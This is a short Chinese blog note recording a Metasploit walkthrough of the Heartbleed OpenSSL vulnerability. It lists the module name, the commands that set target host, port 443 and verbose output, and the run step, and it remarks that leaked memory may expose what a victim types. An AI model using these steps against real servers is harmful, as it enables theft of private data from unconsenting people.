感觉现在都会使用ssl然后利用证书制作https网站也确实很多能进入http的方法到https就没用了
但是https也并非绝对安全这段时间在网上找到了这个名叫心脏滴血的漏洞记录一下
这个漏洞主要用于信息窃取设置好目标后可以将目标在443端口访问的东西监听到
用search heartbleed搜索漏洞利用模块
使用模块use auxiliary/scanner/ssl/openssl_heartbleed
使用show options看一下参数
这里我们需要设置一下rhost和rport,这里的rport我们需要修改一下
set rhost 192.168.167.46
set rport 443
最后设置一下verbose,让verbose为true这样我们才可以看到泄露的数据
set verbose true
这个时候就可以run来运行我们的漏洞利用模块了
可以看到一些泄露的数据,假如这是被攻击端正在输入一些私密的数据,我们就有可能获取到这些数据了。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
